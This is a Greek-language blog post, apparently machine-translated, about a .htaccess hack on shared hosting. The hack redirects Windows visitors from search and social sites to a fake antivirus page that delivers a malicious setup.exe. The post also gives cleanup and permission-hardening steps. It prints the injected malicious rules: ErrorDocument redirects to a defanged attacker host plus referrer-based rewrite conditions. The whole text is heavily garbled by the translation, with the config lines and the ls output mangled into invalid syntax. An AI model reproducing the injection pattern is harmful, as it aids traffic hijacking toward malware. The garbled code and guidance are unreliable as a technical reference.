Malware / Virus - .htaccess "ξαναγράψει" & ανακατεύθυνση

Μια νέα μορφή του ιού οι οποίοι βλέπουν ότι δεν γνωρίζουν πάρα πολύ επηρεάζει sites που φιλοξενούνται σε αναξιόπιστη διακομιστές όπου οι χρήστες λογαριασμών / δευτερεύοντες λογαριασμούς μπορούν να "δουν" ο ένας τον άλλο. Συγκεκριμένα, οι λογαριασμοί φιλοξενίας γίνονται όλα στο φάκελο "vhosts"Γράφοντας και το δικαίωμα του φάκελο χρήστη οι "vhosts" δίνεται μια γενική χρήστη ... μεταπωλητή στις περισσότερες περιπτώσεις. Είναι μια μέθοδος που δεν χρησιμοποιεί τα τυπικά web servers WHM / cPanel.

Δράση του ιού Htaccess -.. Hack Htaccess

Ιός επηρεάζει τα αρχεία .htaccess η θέση των θυμάτων. Γραμμές προστίθενται / Οδηγιών να ανακατευθύνει τους επισκέπτες (Ερχόμενοι από yahoo, msn, google, facebook, yaindex, twitter, myspace, κλπ. ιστοσελίδες και portals με υψηλή επισκεψιμότητα) σε ορισμένες ιστοσελίδες που προσφέρουν "antivirus. "Είναι ψεύτικο antivirus, Για την οποία έγραψα στην εισαγωγή .

Εδώ είναι τι μοιάζει ένας .htaccess επηρεάζονται: (δεν έχουν πρόσβαση στις γραμμές παρακάτω διευθύνσεις URL περιεχόμενο)

ErrorDocument 500 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=0
ErrorDocument 502 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=2
ErrorDocument 403 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=3

RewriteEngine Ενεργοποιημένο

RewriteCond%} {HTTP_REFERER. * Yandex. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * Odnoklassniki. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * Vkontakte. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * Rambler. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * Tube. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * Wikipedia. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * Blogger. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * Baidu. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * Qq.com. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * Myspace. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * Twitter. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * Facebook. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * Google. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * Live. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * AOL. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * Bing. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * Msn. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * Amazon. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * Ebay. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * LinkedIn. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * Flickr. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * LiveJasmin. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * Soso. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * DoubleClick. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * Pornhub. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * Orkut. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * LiveJournal. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * Wordpress. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * Yahoo. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * Ρωτήστε. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * Excite. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * Altavista. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * Msn. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * Netscape. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * Hotbot. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * Goto. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * Infoseek. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * Mamma. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * Alltheweb. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * Lycos. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * Αναζήτηση. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * MetaCrawler. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * Mail. * $ [NC, OR]
RewriteCond%} {HTTP_REFERER. * Dogpile. * $ [NC]

RewriteCond%} {HTTP_USER_AGENT. * Windows *.
RewriteRule. * [R, L]

RewriteCond%} {REQUEST_FILENAME!-F
RewriteCond%} {REQUEST_FILENAME!-D
RewriteCond%} {REQUEST_FILENAME * $ Jpg |!.. * $ Gif |. * Png $
RewriteCond%} {HTTP_USER_AGENT. * Windows *.
RewriteRule. * [R, L]

Εκείνοι που χρησιμοποιούν WordPress θα βρείτε αυτές τις γραμμές στο αρχείο .htaccess από public_html. Επιπλέον, ο ιός δημιουργεί ένα αρχείο. Htaccess στον ίδιο φάκελο WP-περιεχόμενο.

*Υπάρχουν επίσης περιπτώσεις στις οποίες εμφανίζεται αντί peoriavascularsurgery.com dns.thesoulfoodcafe.com ή άλλες διευθύνσεις.

Αυτό που κάνει αυτόν τον ιό.

Μόλις ανακατεύθυνση, ο επισκέπτης έχει υποδεχτεί με ανοιχτές αγκάλες από το μήνυμα:

Προσοχή!
Ο υπολογιστής σας περιέχει διάφορα σημεία ιούς και κακόβουλο λογισμικό Παρουσία προγράμματα. Σύστημα προστασίας από ιούς σας Απαιτεί άμεση επιταγή!
Σύστημα Ασφαλείας Θα εκτελέσετε μια γρήγορη και δωρεάν σάρωση του υπολογιστή σας για ιούς και κακόβουλα προγράμματα.

1 malware

Δεν έχει σημασία που πατάτε το κουμπί, θα λαμβάνονται στη σελίδα "Ο Υπολογιστής μου"Δημιουργήθηκε για να μιμούνται XP σχεδιασμός. Αυτό ξεκινά αυτόματα »σάρωση" στο τέλος της οποίας θα βρούμε ότι "μολυνθεί".

2 malware

Αφού κάνετε κλικ στο κουμπί OK ή Άκυρο, θα ξεκινήσει κατεβάσετεΑρχείο του setup.exe. Αυτό setup.exe είναι ψεύτικο καταπολέμηση του ιού επηρεάζουν το σύστημα. Εγκαταστήστε κάποιο κακόβουλο λογισμικό να διαδώσει περαιτέρω συνδέσεις σε κίνδυνο, εκτός από αυτά και ένα anti-virus λογισμικό (Όλα ψευδής) ότι το θύμα καλείται να αγοράσει.
Όσοι έχουν ήδη επικοινωνήσει με τον ιό μπορεί να χρησιμοποιήσει αυτή τη φόρμα . Είναι, επίσης, συνιστάται να σαρώσει ολόκληρο το σκληρό δίσκο. Συστήνω Το Kaspersky Internet Security ή Kaspersky Anti Virus.

Αυτός ο τύπος του ιού επηρεάζει Επισκέπτης λειτουργικά συστήματα OS Windows XP, Windows ME, Windows 2000, Windows NT, Windows 98 και Windows 95. Μέχρι σήμερα δεν υπάρχουν γνωστές περιπτώσεις μόλυνσης των λειτουργικών συστημάτων Windows Vista και Windows 7.

Πώς μπορούμε να εξαλείψει τον ιό. Htaccess αρχείο στον server και πώς να την πρόληψη της λοίμωξης.

1. Αναλύστε ύποπτα αρχεία και διαγραφή κωδικών. Για να εξασφαλιστεί ότι το αρχείο δεν επηρεάζεται μόνο .htaccess θα πρέπει αναλύσει όλα τα αρχεία . Php si . Js.

2. Ξαναγράψτε το αρχείο. Htaccess και να ρυθμίσετε το chmod 644 ή 744 με πρόσβαση εγγραφής μόνο χρήστη του ιδιοκτήτη.

3. Όταν δημιουργείτε ένα λογαριασμό φιλοξενίας για την ιστοσελίδα στο φάκελο / Αρχική σελίδα ή / Webroot Αυτό θα δημιουργήσει αυτόματα ένα φάκελο που έχει συχνά το όνομα του χρήστη (χρήστη για cpanel, ftpΚ.λπ.). Για να αποφύγετε την εγγραφή δεδομένων και τη μετάδοση των ιών από τον ένα χρήστη στον άλλο, συνιστάται ότι κάθε φάκελο χρήστη να καθοριστούν:

chmod 644 ή 744, 755 - παρουσιάζεται είναι 644.
chown-R nume_user nume_folder.
chgrp-R nume_user nume_folder

ls-όλα τρόποι για να ελέγξετε αν έγιναν σωστά. Αν εμφανιστεί κάτι σαν αυτό:

drwx-x-x 12 dinamics dinamics Μαΐου 4096 6 14: 51 dinamics /
drwx-x-x 10 4096 Μαρτίου 7 07 Duran Duran: Duran 46 /
drwx-x-x 12 σωλήνες σωλήνες 4096 Ιαν 29 11: 23 σωλήνες /
drwxr-xr-x 14 4096 Φεβρουάριο 26 2009 Express Express Express /
drwxr-xr-x 9 EZO EZO 4096 Μαΐου 19 01: 09 EZO /
drwx-x-x 9 φαρμακευτική φαρμακευτική 4096 Δεκέμβριο 19 22: 29 φαρμακευτική /

Εάν ένα από τα παραπάνω θα userele FTP Μολυσμένα αρχείαΔεν μπορείτε να στείλετε τον ιό σε άλλο χρήστη υποδοχής. Είναι ένα ελάχιστο μέτρο ασφαλείας για την προστασία των λογαριασμών φιλοξενείται σε έναν web server.

Κοινά στοιχεία των περιοχών που έχουν πληγεί από τον ιό.

Όλες οι περιοχές που έχουν πληγεί ανακατευθύνει τους επισκέπτες σε δικτυακούς τόπους με το όνομα τομέα που περιέχουν "/".

η "ιό. htaccess«Επηρεάζουν οποιοδήποτε CMS (Joomla, WordPress, phpBBΚ.λπ.) με τη χρήση .htaccess.

. Htaccess Redirect Virus & Hack.

Malware / Virus - .htaccess "ξαναγράψει" & ανακατεύθυνση

Σχετικά με τον Συγγραφέα

stealth LP

Ιδρυτής και εκδότης Ρυθμίσεις stealthΣτο 2006 ημερομηνία.
Η εμπειρία σε λειτουργικά συστήματα Linux (ειδικά CentOS), Mac OS X, Windows XP> των Windows 10 και WordPress (CMS).

Αφήστε ένα σχόλιο

Αυτός ο ιστότοπος χρησιμοποιεί το Akismet για να μειώσει το spam. Μάθετε πώς επεξεργάζονται τα δεδομένα των σχολίων σας.